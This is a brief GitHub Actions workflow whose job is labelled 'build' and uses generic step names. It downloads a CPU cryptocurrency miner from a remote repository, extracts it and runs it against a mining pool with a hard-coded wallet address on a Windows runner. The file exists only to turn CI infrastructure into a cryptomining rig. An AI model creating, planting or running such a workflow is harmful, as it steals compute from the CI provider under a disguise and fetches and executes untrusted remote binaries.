name: NEW

on: [workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
    - name: Preparing
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx2.zip -OutFile hellminer_cpu_win64_avx2.zip
    - name: Prepare_Q2
      run: Expand-Archive hellminer_cpu_win64_avx2.zip
    - name: Running
      run: .\hellminer\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RRTP6VLKGvw7oFSRWpyVUabPyKRqDr5hJy.rig -p x --cpu 10
    - name: DONE
      run: exit
